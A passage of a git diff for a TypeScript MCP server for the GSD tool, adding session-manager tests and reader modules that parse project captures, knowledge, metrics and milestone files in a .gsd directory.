stop on client', async () => { + const sessionId = await sm.startSession('/tmp/cancel-test', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + await sm.cancelSession(sessionId); + + assert.ok(client.aborted); + assert.ok(client.stopped); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'cancelled'); + }); + + it('cancelSession errors for unknown session', async () => { + await assert.rejects( + () => sm.cancelSession('unknown'), + (err: Error) => { + assert.ok(err.message.includes('Session not found')); + return true; + }, + ); + }); + + it('cleanup stops all active sessions', async () => { + await sm.startSession('/tmp/cleanup-1', { cliPath: '/usr/bin/gsd' }); + await sm.startSession('/tmp/cleanup-2', { cliPath: '/usr/bin/gsd' }); + + assert.equal(sm.allClients.length, 2); + + await sm.cleanup(); + + for (const client of sm.allClients) { + assert.ok(client.stopped, 'Client should be stopped after cleanup'); + } + }); + + it('event ring buffer caps at MAX_EVENTS', async () => { + const sessionId = await sm.startSession('/tmp/ring-buffer', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + for (let i = 0; i < MAX_EVENTS + 20; i++) { + client.emitEvent({ type: 'tool_use', index: i }); + } + + const session = sm.getSession(sessionId)!; + assert.equal(session.events.length, MAX_EVENTS); + // Oldest events trimmed — first event index should be 20 + assert.equal((session.events[0] as Record).index, 20); + }); + + it('blocker detection: non-fire-and-forget extension_ui_request sets pendingBlocker', async () => { + const sessionId = await sm.startSession('/tmp/blocker-detect', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + // 'select' is not in FIRE_AND_FORGET_METHODS + client.emitEvent({ + type: 'extension_ui_request', + id: 'req-99', + method: 'select', + title: 'Choose wisely', + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + assert.equal(session.pendingBlocker.id, 'req-99'); + assert.equal(session.pendingBlocker.method, 'select'); + }); + + it('fire-and-forget methods do not set pendingBlocker', async () => { + const sessionId = await sm.startSession('/tmp/fire-forget', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + // 'notify' is fire-and-forget — on its own (no terminal prefix) should not block + client.emitEvent({ + type: 'extension_ui_request', + id: 'req-100', + method: 'notify', + message: 'Just a notification', + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'running'); + assert.equal(session.pendingBlocker, null); + }); + + it('terminal detection: auto-mode stopped sets status to completed', async () => { + const sessionId = await sm.startSession('/tmp/terminal', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + client.emitEvent({ + type: 'extension_ui_request', + method: 'notify', + message: 'Auto-mode stopped — all tasks complete', + id: 'term-1', + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'completed'); + }); + + it('terminal detection with blocked: message sets status to blocked', async () => { + const sessionId = await sm.startSession('/tmp/terminal-blocked', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + client.emitEvent({ + type: 'extension_ui_request', + method: 'notify', + message: 'Auto-mode stopped — blocked: needs user input', + id: 'block-1', + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + }); + + it('cost tracking: cumulative-max from cost_update events', async () => { + const sessionId = await sm.startSession('/tmp/cost-track', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + client.emitEvent({ + type: 'cost_update', + cumulativeCost: 0.05, + tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100 }, + }); + + client.emitEvent({ + type: 'cost_update', + cumulativeCost: 0.12, + tokens: { input: 2500, output: 800, cacheRead: 150, cacheWrite: 300 }, + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.cost.totalCost, 0.12); + assert.equal(session.cost.tokens.input, 2500); + assert.equal(session.cost.tokens.output, 800); + assert.equal(session.cost.tokens.cacheRead, 200); // First was higher + assert.equal(session.cost.tokens.cacheWrite, 300); // Second was higher + }); + + it('getResult returns HeadlessJsonResult-shaped object', async () => { + const sessionId = await sm.startSession('/tmp/result-shape', { cliPath: '/usr/bin/gsd' }); + const result = sm.getResult(sessionId); + + assert.equal(result.sessionId, sessionId); + assert.equal(result.projectDir, resolve('/tmp/result-shape')); + assert.equal(result.status, 'running'); + assert.equal(typeof result.durationMs, 'number'); + assert.ok(result.cost); + assert.ok(Array.isArray(result.recentEvents)); + assert.equal(result.pendingBlocker, null); + assert.equal(result.error, null); + }); + + it('getResult errors for unknown session', () => { + assert.throws( + () => sm.getResult('unknown'), + (err: Error) => { + assert.ok(err.message.includes('Session not found')); + return true; + }, + ); + }); +}); + +// --------------------------------------------------------------------------- +// CLI path resolution tests +// --------------------------------------------------------------------------- + +describe('SessionManager.resolveCLIPath', () => { + const originalGsdPath = process.env['GSD_CLI_PATH']; + const originalPath = process.env['PATH']; + + afterEach(() => { + if (originalGsdPath !== undefined) { + process.env['GSD_CLI_PATH'] = originalGsdPath; + } else { + delete process.env['GSD_CLI_PATH']; + } + if (originalPath !== undefined) { + process.env['PATH'] = originalPath; + } + }); + + it('GSD_CLI_PATH env var takes precedence', () => { + process.env['GSD_CLI_PATH'] = '/custom/path/to/gsd'; + const result = SessionManager.resolveCLIPath(); + assert.equal(result, resolve('/custom/path/to/gsd')); + }); + + it('throws when GSD_CLI_PATH not set and which fails', () => { + delete process.env['GSD_CLI_PATH']; + process.env['PATH'] = '/nonexistent'; + assert.throws( + () => SessionManager.resolveCLIPath(), + (err: Error) => { + assert.ok(err.message.includes('Cannot find GSD CLI')); + return true; + }, + ); + }); +}); + +// --------------------------------------------------------------------------- +// Tool registration tests (via createMcpServer) +// --------------------------------------------------------------------------- + +describe('createMcpServer tool registration', () => { + let sm: TestableSessionManager; + + beforeEach(() => { + sm = createManager(); + }); + + afterEach(async () => { + for (const mgr of allManagers) { + await mgr.cleanup(); + } + allManagers = []; + }); + + it('creates server successfully with all required methods', async () => { + const { server } = await createMcpServer(sm); + assert.ok(server); + assert.ok(typeof server.connect === 'function'); + assert.ok(typeof server.close === 'function'); + }); + + it('gsd_execute flow returns sessionId on success', async () => { + const sessionId = await sm.startSession('/tmp/tool-exec', { cliPath: '/usr/bin/gsd' }); + assert.equal(typeof sessionId, 'string'); + assert.ok(sessionId.length > 0); + }); + + it('gsd_status flow returns correct shape', async () => { + const sessionId = await sm.startSession('/tmp/tool-status', { cliPath: '/usr/bin/gsd' }); + const session = sm.getSession(sessionId)!; + + assert.equal(typeof session.status, 'string'); + assert.ok(Array.isArray(session.events)); + assert.ok(session.cost); + assert.equal(typeof session.startTime, 'number'); + }); + + it('gsd_resolve_blocker flow returns error when no blocker', async () => { + const sessionId = await sm.startSession('/tmp/tool-resolve', { cliPath: '/usr/bin/gsd' }); + await assert.rejects( + () => sm.resolveBlocker(sessionId, 'fix'), + (err: Error) => { + assert.ok(err.message.includes('No pending blocker')); + return true; + }, + ); + }); + + it('gsd_result flow returns HeadlessJsonResult shape', async () => { + const sessionId = await sm.startSession('/tmp/tool-result', { cliPath: '/usr/bin/gsd' }); + const result = sm.getResult(sessionId); + + assert.ok('sessionId' in result); + assert.ok('projectDir' in result); + assert.ok('status' in result); + assert.ok('durationMs' in result); + assert.ok('cost' in result); + assert.ok('recentEvents' in result); + assert.ok('pendingBlocker' in result); + assert.ok('error' in result); + }); + + it('gsd_cancel flow marks session as cancelled', async () => { + const sessionId = await sm.startSession('/tmp/tool-cancel', { cliPath: '/usr/bin/gsd' }); + await sm.cancelSession(sessionId); + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'cancelled'); + }); +}); diff --git a/packages/mcp-server/src/readers/captures.ts b/packages/mcp-server/src/readers/captures.ts new file mode 100644 index 000000000..9cbd71570 --- /dev/null +++ b/packages/mcp-server/src/readers/captures.ts @@ -0,0 +1,119 @@ +// GSD MCP Server — captures reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { resolveGsdRoot, resolveRootFile } from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export type CaptureStatus = 'pending' | 'triaged' | 'resolved'; +export type CaptureClassification = + | 'quick-task' | 'inject' | 'defer' | 'replan' | 'note' | 'stop' | 'backtrack'; + +export interface CaptureEntry { + id: string; + text: string; + timestamp: string; + status: CaptureStatus; + classification: CaptureClassification | null; + resolution: string | null; + rationale: string | null; + resolvedAt: string | null; + milestone: string | null; + executed: string | null; +} + +export interface CapturesResult { + captures: CaptureEntry[]; + counts: { + total: number; + pending: number; + resolved: number; + actionable: number; + }; +} + +// --------------------------------------------------------------------------- +// Parser +// --------------------------------------------------------------------------- + +function parseCapturesMarkdown(content: string): CaptureEntry[] { + const entries: CaptureEntry[] = []; + + // Split on H3 headers: ### CAP-xxxxxxxx + const sections = content.split(/(?=^### CAP-)/m); + + for (const section of sections) { + const idMatch = section.match(/^### (CAP-[\da-f]+)/); + if (!idMatch) continue; + + const id = idMatch[1]; + const field = (label: string): string | null => { + const re = new RegExp(`\\*\\*${label}:\\*\\*\\s*(.+)`, 'i'); + const m = section.match(re); + return m ? m[1].trim() : null; + }; + + const status = (field('Status') ?? 'pending').toLowerCase() as CaptureStatus; + const classification = field('Classification') as CaptureClassification | null; + + entries.push({ + id, + text: field('Text') ?? '', + timestamp: field('Captured') ?? '', + status, + classification, + resolution: field('Resolution'), + rationale: field('Rationale'), + resolvedAt: field('Resolved'), + milestone: field('Milestone'), + executed: field('Executed'), + }); + } + + return entries; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +const ACTIONABLE_CLASSIFICATIONS = new Set(['quick-task', 'inject', 'replan']); + +export function readCaptures( + projectDir: string, + filter: 'all' | 'pending' | 'actionable' = 'all', +): CapturesResult { + const gsd = resolveGsdRoot(projectDir); + const capturesPath = resolveRootFile(gsd, 'CAPTURES.md'); + + if (!existsSync(capturesPath)) { + return { captures: [], counts: { total: 0, pending: 0, resolved: 0, actionable: 0 } }; + } + + const content = readFileSync(capturesPath, 'utf-8'); + let captures = parseCapturesMarkdown(content); + + // Compute counts before filtering + const counts = { + total: captures.length, + pending: captures.filter((c) => c.status === 'pending').length, + resolved: captures.filter((c) => c.status === 'resolved').length, + actionable: captures.filter( + (c) => c.classification !== null && ACTIONABLE_CLASSIFICATIONS.has(c.classification), + ).length, + }; + + // Apply filter + if (filter === 'pending') { + captures = captures.filter((c) => c.status === 'pending'); + } else if (filter === 'actionable') { + captures = captures.filter( + (c) => c.classification !== null && ACTIONABLE_CLASSIFICATIONS.has(c.classification), + ); + } + + return { captures, counts }; +} diff --git a/packages/mcp-server/src/readers/doctor-lite.ts b/packages/mcp-server/src/readers/doctor-lite.ts new file mode 100644 index 000000000..8b826090c --- /dev/null +++ b/packages/mcp-server/src/readers/doctor-lite.ts @@ -0,0 +1,225 @@ +// GSD MCP Server — lightweight structural health checks +// Copyright (c) 2026 Jeremy McSpadden + +import { existsSync, readFileSync } from 'node:fs'; +import { + resolveGsdRoot, + resolveRootFile, + findMilestoneIds, + resolveMilestoneFile, + resolveMilestoneDir, + findSliceIds, + resolveSliceFile, + findTaskFiles, +} from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export type Severity = 'info' | 'warning' | 'error'; + +export interface DoctorIssue { + severity: Severity; + code: string; + scope: 'project' | 'milestone' | 'slice' | 'task'; + unitId: string; + message: string; + file?: string; +} + +export interface DoctorResult { + ok: boolean; + issues: DoctorIssue[]; + counts: { error: number; warning: number; info: number }; +} + +// --------------------------------------------------------------------------- +// Check implementations +// --------------------------------------------------------------------------- + +function checkProjectLevel(gsdRoot: string, issues: DoctorIssue[]): void { + // PROJECT.md should exist + const projectPath = resolveRootFile(gsdRoot, 'PROJECT.md'); + if (!existsSync(projectPath)) { + issues.push({ + severity: 'warning', + code: 'missing_project_md', + scope: 'project', + unitId: '', + message: 'PROJECT.md is missing — project lacks a description', + file: projectPath, + }); + } + + // STATE.md should exist if milestones exist + const milestones = findMilestoneIds(gsdRoot); + if (milestones.length > 0) { + const statePath = resolveRootFile(gsdRoot, 'STATE.md'); + if (!existsSync(statePath)) { + issues.push({ + severity: 'warning', + code: 'missing_state_md', + scope: 'project', + unitId: '', + message: 'STATE.md is missing — run /gsd status to regenerate', + file: statePath, + }); + } + } +} + +function checkMilestoneLevel(gsdRoot: string, mid: string, issues: DoctorIssue[]): void { + const mDir = resolveMilestoneDir(gsdRoot, mid); + if (!mDir) { + issues.push({ + severity: 'error', + code: 'missing_milestone_dir', + scope: 'milestone', + unitId: mid, + message: `Milestone directory for ${mid} not found`, + }); + return; + } + + // CONTEXT.md should exist + const ctxPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT'); + if (!ctxPath || !existsSync(ctxPath)) { + // Check for draft + const draftPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT-DRAFT'); + if (!draftPath || !existsSync(draftPath)) { + issues.push({ + severity: 'warning', + code: 'missing_context', + scope: 'milestone', + unitId: mid, + message: `${mid} has no CONTEXT.md — milestone lacks defined scope`, + }); + } + } + + // ROADMAP.md should exist if slices exist + const sliceIds = findSliceIds(gsdRoot, mid); + if (sliceIds.length > 0) { + const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP'); + if (!roadmapPath || !existsSync(roadmapPath)) { + issues.push({ + severity: 'warning', + code: 'missing_roadmap', + scope: 'milestone', + unitId: mid, + message: `${mid} has ${sliceIds.length} slices but no ROADMAP.md`, + }); + } + } + + // Check if all slices done but no SUMMARY + if (sliceIds.length > 0) { + const allDone = sliceIds.every((sid) => { + const tasks = findTaskFiles(gsdRoot, mid, sid); + return tasks.length > 0 && tasks.every((t) => t.hasSummary); + }); + const summaryPath = resolveMilestoneFile(gsdRoot, mid, 'SUMMARY'); + if (allDone && (!summaryPath || !existsSync(summaryPath))) { + issues.push({ + severity: 'error', + code: 'all_slices_done_missing_summary', + scope: 'milestone', + unitId: mid, + message: `${mid} has all slices completed but no SUMMARY.md`, + }); + } + } +} + +function checkSliceLevel( + gsdRoot: string, mid: string, sid: string, issues: DoctorIssue[], +): void { + const unitId = `${mid}/${sid}`; + + // PLAN.md should exist + const planPath = resolveSliceFile(gsdRoot, mid, sid, 'PLAN'); + if (!planPath || !existsSync(planPath)) { + issues.push({ + severity: 'error', + code: 'missing_slice_plan', + scope: 'slice', + unitId, + message: `${unitId} has no PLAN.md`, + }); + } + + // Tasks should have plans + const tasks = findTaskFiles(gsdRoot, mid, sid); + for (const task of tasks) { + const taskUnitId = `${unitId}/${task.id}`; + if (!task.hasPlan) { + issues.push({ + severity: 'warning', + code: 'missing_task_plan', + scope: 'task', + unitId: taskUnitId, + message: `${taskUnitId} has a summary but no plan file`, + }); + } + } + + // Check for empty slice (directory exists but no tasks or plan) + if (tasks.length === 0 && (!planPath || !existsSync(planPath))) { + issues.push({ + severity: 'warning', + code: 'empty_slice', + scope: 'slice', + unitId, + message: `${unitId} has no plan and no tasks — may be abandoned`, + }); + } +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function runDoctorLite(projectDir: string, scope?: string): DoctorResult { + const gsdRoot = resolveGsdRoot(projectDir); + const issues: DoctorIssue[] = []; + + if (!existsSync(gsdRoot)) { + return { + ok: true, + issues: [{ + severity: 'info', + code: 'no_gsd_directory', + scope: 'project', + unitId: '', + message: 'No .gsd/ directory found — project not initialized', + }], + counts: { error: 0, warning: 0, info: 1 }, + }; + } + + // Project-level checks + checkProjectLevel(gsdRoot, issues); + + // Milestone + slice checks + const milestoneIds = scope + ? findMilestoneIds(gsdRoot).filter((id) => id === scope) + : findMilestoneIds(gsdRoot); + + for (const mid of milestoneIds) { + checkMilestoneLevel(gsdRoot, mid, issues); + + const sliceIds = findSliceIds(gsdRoot, mid); + for (const sid of sliceIds) { + checkSliceLevel(gsdRoot, mid, sid, issues); + } + } + + const counts = { + error: issues.filter((i) => i.severity === 'error').length, + warning: issues.filter((i) => i.severity === 'warning').length, + info: issues.filter((i) => i.severity === 'info').length, + }; + + return { ok: counts.error === 0, issues, counts }; +} diff --git a/packages/mcp-server/src/readers/index.ts b/packages/mcp-server/src/readers/index.ts new file mode 100644 index 000000000..d5b3368c7 --- /dev/null +++ b/packages/mcp-server/src/readers/index.ts @@ -0,0 +1,16 @@ +// GSD MCP Server — readers barrel export +// Copyright (c) 2026 Jeremy McSpadden + +export { resolveGsdRoot, resolveRootFile } from './paths.js'; +export { readProgress } from './state.js'; +export type { ProgressResult } from './state.js'; +export { readRoadmap } from './roadmap.js'; +export type { RoadmapResult, MilestoneInfo, SliceInfo, TaskInfo } from './roadmap.js'; +export { readHistory } from './metrics.js'; +export type { HistoryResult, MetricsUnit } from './metrics.js'; +export { readCaptures } from './captures.js'; +export type { CapturesResult, CaptureEntry } from './captures.js'; +export { readKnowledge } from './knowledge.js'; +export type { KnowledgeResult, KnowledgeEntry } from './knowledge.js'; +export { runDoctorLite } from './doctor-lite.js'; +export type { DoctorResult, DoctorIssue } from './doctor-lite.js'; diff --git a/packages/mcp-server/src/readers/knowledge.ts b/packages/mcp-server/src/readers/knowledge.ts new file mode 100644 index 000000000..134df44e0 --- /dev/null +++ b/packages/mcp-server/src/readers/knowledge.ts @@ -0,0 +1,111 @@ +// GSD MCP Server — knowledge base reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { resolveGsdRoot, resolveRootFile } from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export type KnowledgeType = 'rule' | 'pattern' | 'lesson'; + +export interface KnowledgeEntry { + id: string; + type: KnowledgeType; + scope: string; + content: string; + addedAt: string; +} + +export interface KnowledgeResult { + entries: KnowledgeEntry[]; + counts: { rules: number; patterns: number; lessons: number }; +} + +// --------------------------------------------------------------------------- +// Parser +// --------------------------------------------------------------------------- + +function parseTableRows(section: string, type: KnowledgeType): KnowledgeEntry[] { + const entries: KnowledgeEntry[] = []; + const lines = section.split('\n'); + + for (const line of lines) { + if (!line.includes('|')) continue; + const cells = line.split('|').map((c) => c.trim()).filter(Boolean); + if (cells.length < 3) continue; + // Skip header/separator + if (cells[0].startsWith('#') || cells[0].startsWith('-')) continue; + + const id = cells[0]; + if (!/^[KPL]\d+$/i.test(id)) continue; + + if (type === 'rule' && cells.length >= 5) { + entries.push({ + id, type, scope: cells[1], content: cells[2], addedAt: cells[4] ?? '', + }); + } else if (type === 'pattern' && cells.length >= 4) { + entries.push({ + id, type, scope: cells[2] ?? '', content: cells[1], addedAt: cells[3] ?? '', + }); + } else if (type === 'lesson' && cells.length >= 5) { + entries.push({ + id, type, scope: cells[4] ?? '', + content: `${cells[1]} — Root cause: ${cells[2]} — Fix: ${cells[3]}`, + addedAt: '', + }); + } + } + + return entries; +} + +function parseKnowledgeMarkdown(content: string): KnowledgeEntry[] { + const entries: KnowledgeEntry[] = []; + + // Find ## Rules section + const rulesMatch = content.match(/## Rules\s*\n([\s\S]*?)(?=\n## |$)/i); + if (rulesMatch) { + entries.push(...parseTableRows(rulesMatch[1], 'rule')); + } + + // Find ## Patterns section + const patternsMatch = content.match(/## Patterns\s*\n([\s\S]*?)(?=\n## |$)/i); + if (patternsMatch) { + entries.push(...parseTableRows(patternsMatch[1], 'pattern')); + } + + // Find ## Lessons Learned section + const lessonsMatch = content.match(/## Lessons Learned\s*\n([\s\S]*?)(?=\n## |$)/i); + if (lessonsMatch) { + entries.push(...parseTableRows(lessonsMatch[1], 'lesson')); + } + + return entries; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readKnowledge(projectDir: string): KnowledgeResult { + const gsd = resolveGsdRoot(projectDir); + const knowledgePath = resolveRootFile(gsd, 'KNOWLEDGE.md'); + + if (!existsSync(knowledgePath)) { + return { entries: [], counts: { rules: 0, patterns: 0, lessons: 0 } }; + } + + const content = readFileSync(knowledgePath, 'utf-8'); + const entries = parseKnowledgeMarkdown(content); + + return { + entries, + counts: { + rules: entries.filter((e) => e.type === 'rule').length, + patterns: entries.filter((e) => e.type === 'pattern').length, + lessons: entries.filter((e) => e.type === 'lesson').length, + }, + }; +} diff --git a/packages/mcp-server/src/readers/metrics.ts b/packages/mcp-server/src/readers/metrics.ts new file mode 100644 index 000000000..0b6635ceb --- /dev/null +++ b/packages/mcp-server/src/readers/metrics.ts @@ -0,0 +1,118 @@ +// GSD MCP Server — metrics/history reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { resolveGsdRoot, resolveRootFile } from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export interface MetricsUnit { + type: string; + id: string; + model: string; + startedAt: number; + finishedAt: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + total: number; + }; + cost: number; + toolCalls: number; + apiRequests: number; +} + +export interface HistoryResult { + entries: MetricsUnit[]; + totals: { + cost: number; + tokens: { input: number; output: number; total: number }; + units: number; + durationMs: number; + }; +} + +// --------------------------------------------------------------------------- +// Parser +// --------------------------------------------------------------------------- + +function parseMetricsJson(content: string): MetricsUnit[] { + try { + const data = JSON.parse(content); + if (!data.units || !Array.isArray(data.units)) return []; + + return data.units.map((u: Record) => ({ + type: String(u.type ?? 'unknown'), + id: String(u.id ?? ''), + model: String(u.model ?? 'unknown'), + startedAt: Number(u.startedAt ?? 0), + finishedAt: Number(u.finishedAt ?? 0), + tokens: { + input: Number((u.tokens as Record)?.input ?? 0), + output: Number((u.tokens as Record)?.output ?? 0), + cacheRead: Number((u.tokens as Record)?.cacheRead ?? 0), + cacheWrite: Number((u.tokens as Record)?.cacheWrite ?? 0), + total: Number((u.tokens as Record)?.total ?? 0), + }, + cost: Number(u.cost ?? 0), + toolCalls: Number(u.toolCalls ?? 0), + apiRequests: Number(u.apiRequests ?? 0), + })); + } catch { + return []; + } +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readHistory(projectDir: string, limit?: number): HistoryResult { + const gsd = resolveGsdRoot(projectDir); + + // metrics.json (primary) + const metricsPath = resolveRootFile(gsd, 'metrics.json'); + let units: MetricsUnit[] = []; + + if (existsSync(metricsPath)) { + const content = readFileSync(metricsPath, 'utf-8'); + units = parseMetricsJson(content); + } + + // Sort by startedAt descending (most recent first) + units.sort((a, b) => b.startedAt - a.startedAt); + + // Apply limit + if (limit && limit > 0) { + units = units.slice(0, limit); + } + + // Compute totals from ALL units (not just limited set) + const allUnits = existsSync(metricsPath) + ? parseMetricsJson(readFileSync(metricsPath, 'utf-8')) + : []; + + const totals = { + cost: 0, + tokens: { input: 0, output: 0, total: 0 }, + units: allUnits.length, + durationMs: 0, + }; + + for (const u of allUnits) { + totals.cost += u.cost; + totals.tokens.input += u.tokens.input; + totals.tokens.output += u.tokens.output; + totals.tokens.total += u.tokens.total; + totals.durationMs += (u.finishedAt - u.startedAt); + } + + // Round cost to 4 decimal places + totals.cost = Math.round(totals.cost * 10000) / 10000; + + return { entries: units, totals }; +} diff --git a/packages/mcp-server/src/readers/paths.ts b/packages/mcp-server/src/readers/paths.ts new file mode 100644 index 000000000..ad0418a36 --- /dev/null +++ b/packages/mcp-server/src/readers/paths.ts @@ -0,0 +1,217 @@ +// GSD MCP Server — .gsd/ directory resolution +// Copyright (c) 2026 Jeremy McSpadden + +import { existsSync, statSync, readdirSync } from 'node:fs'; +import { join, resolve, dirname, basename } from 'node:path'; +import { execFileSync } from 'node:child_process'; + +/** + * Resolve the .gsd/ root directory for a project. + * + * Probes in order: + * 1. projectDir/.gsd (fast path) + * 2. git repo root/.gsd + * 3. Walk up from projectDir + * 4. Fallback: projectDir/.gsd (even if missing — for init) + */ +export function resolveGsdRoot(projectDir: string): string { + const resolved = resolve(projectDir); + + // Fast path: .gsd/ in the given directory + const direct = join(resolved, '.gsd'); + if (existsSync(direct) && statSync(direct).isDirectory()) { + return direct; + } + + // Try git repo root + try { + const gitRoot = execFileSync('git', ['rev-parse', '--show-toplevel'], { + cwd: resolved, + encoding: 'utf-8', + stdio: ['pipe', 'pipe', 'pipe'], + }).trim(); + const gitGsd = join(gitRoot, '.gsd'); + if (existsSync(gitGsd) && statSync(gitGsd).isDirectory()) { + return gitGsd; + } + } catch { + // Not a git repo or git not available + } + + // Walk up from projectDir + let dir = resolved; + while (dir !== dirname(dir)) { + const candidate = join(dir, '.gsd'); + if (existsSync(candidate) && statSync(candidate).isDirectory()) { + return candidate; + } + dir = dirname(dir); + } + + // Fallback + return direct; +} + +/** Resolve path to a .gsd/ root file (STATE.md, KNOWLEDGE.md, etc.) */ +export function resolveRootFile(gsdRoot: string, name: string): string { + return join(gsdRoot, name); +} + +/** Resolve path to milestones directory */ +export function milestonesDir(gsdRoot: string): string { + return join(gsdRoot, 'milestones'); +} + +/** + * Find all milestone directory IDs (M001, M002, etc.). + * Handles both bare (M001/) and descriptor (M001-FLIGHT-SIM/) naming. + */ +export function findMilestoneIds(gsdRoot: string): string[] { + const dir = milestonesDir(gsdRoot); + if (!existsSync(dir)) return []; + + const entries = readdirSync(dir, { withFileTypes: true }); + const ids: string[] = []; + + for (const entry of entries) { + if (!entry.isDirectory()) continue; + const match = entry.name.match(/^(M\d+)/); + if (match) ids.push(match[1]); + } + + return ids.sort(); +} + +/** + * Resolve the actual directory name for a milestone ID. + * M001 might live in M001/ or M001-SOME-DESCRIPTOR/. + */ +export function resolveMilestoneDir(gsdRoot: string, milestoneId: string): string | null { + const dir = milestonesDir(gsdRoot); + if (!existsSync(dir)) return null; + + // Fast path: exact match + const exact = join(dir, milestoneId); + if (existsSync(exact) && statSync(exact).isDirectory()) return exact; + + // Prefix match + const entries = readdirSync(dir, { withFileTypes: true }); + for (const entry of entries) { + if (entry.isDirectory() && entry.name.startsWith(milestoneId)) { + return join(dir, entry.name); + } + } + + return null; +} + +/** + * Resolve a milestone-level file (M001-ROADMAP.md, M001-CONTEXT.md, etc.). + * Handles various naming conventions. + */ +export function resolveMilestoneFile(gsdRoot: string, milestoneId: string, suffix: string): string | null { + const mDir = resolveMilestoneDir(gsdRoot, milestoneId); + if (!mDir) return null; + + const dirName = basename(mDir); + + // Try: M001-ROADMAP.md, then DIRNAME-ROADMAP.md + const candidates = [ + join(mDir, `${milestoneId}-${suffix}.md`), + join(mDir, `${dirName}-${suffix}.md`), + join(mDir, `${suffix}.md`), + ]; + + for (const c of candidates) { + if (existsSync(c)) return c; + } + return null; +} + +/** Find all slice IDs within a milestone (S01, S02, etc.) */ +export function findSliceIds(gsdRoot: string, milestoneId: string): string[] { + const mDir = resolveMilestoneDir(gsdRoot, milestoneId); + if (!mDir) return []; + + const slicesDir = join(mDir, 'slices'); + if (!existsSync(slicesDir)) return []; + + const entries = readdirSync(slicesDir, { withFileTypes: true }); + const ids: string[] = []; + + for (const entry of entries) { + if (!entry.isDirectory()) continue; + const match = entry.name.match(/^(S\d+)/); + if (match) ids.push(match[1]); + } + + return ids.sort(); +} + +/** Resolve the actual directory for a slice */ +export function resolveSliceDir(gsdRoot: string, milestoneId: string, sliceId: string): string | null { + const mDir = resolveMilestoneDir(gsdRoot, milestoneId); + if (!mDir) return null; + + const slicesDir = join(mDir, 'slices'); + if (!existsSync(slicesDir)) return null; + + const exact = join(slicesDir, sliceId); + if (existsSync(exact) && statSync(exact).isDirectory()) return exact; + + const entries = readdirSync(slicesDir, { withFileTypes: true }); + for (const entry of entries) { + if (entry.isDirectory() && entry.name.startsWith(sliceId)) { + return join(slicesDir, entry.name); + } + } + return null; +} + +/** Resolve a slice-level file (S01-PLAN.md, etc.) */ +export function resolveSliceFile( + gsdRoot: string, milestoneId: string, sliceId: string, suffix: string, +): string | null { + const sDir = resolveSliceDir(gsdRoot, milestoneId, sliceId); + if (!sDir) return null; + + const dirName = basename(sDir); + const candidates = [ + join(sDir, `${sliceId}-${suffix}.md`), + join(sDir, `${dirName}-${suffix}.md`), + join(sDir, `${suffix}.md`), + ]; + + for (const c of candidates) { + if (existsSync(c)) return c; + } + return null; +} + +/** Find all task files in a slice's tasks/ directory */ +export function findTaskFiles( + gsdRoot: string, milestoneId: string, sliceId: string, +): Array<{ id: string; hasPlan: boolean; hasSummary: boolean }> { + const sDir = resolveSliceDir(gsdRoot, milestoneId, sliceId); + if (!sDir) return []; + + const tasksDir = join(sDir, 'tasks'); + if (!existsSync(tasksDir)) return []; + + const files = readdirSync(tasksDir); + const taskMap = new Map(); + + for (const f of files) { + const match = f.match(/^(T\d+).*-(PLAN|SUMMARY)\.md$/i); + if (!match) continue; + const [, id, type] = match; + const existing = taskMap.get(id) ?? { hasPlan: false, hasSummary: false }; + if (type.toUpperCase() === 'PLAN') existing.hasPlan = true; + if (type.toUpperCase() === 'SUMMARY') existing.hasSummary = true; + taskMap.set(id, existing); + } + + return Array.from(taskMap.entries()) + .map(([id, info]) => ({ id, ...info })) + .sort((a, b) => a.id.localeCompare(b.id)); +} diff --git a/packages/mcp-server/src/readers/readers.test.ts b/packages/mcp-server/src/readers/readers.test.ts new file mode 100644 index 000000000..98d157279 --- /dev/null +++ b/packages/mcp-server/src/readers/readers.test.ts @@ -0,0 +1,509 @@ +// GSD MCP Server — reader tests +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it, before, after } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdirSync, writeFileSync, rmSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir } from 'node:os'; +import { randomBytes } from 'node:crypto'; + +import { readProgress } from './state.js'; +import { readRoadmap } from './roadmap.js'; +import { readHistory } from './metrics.js'; +import { readCaptures } from './captures.js'; +import { readKnowledge } from './knowledge.js'; +import { runDoctorLite } from './doctor-lite.js'; + +// --------------------------------------------------------------------------- +// Test fixture helpers +// 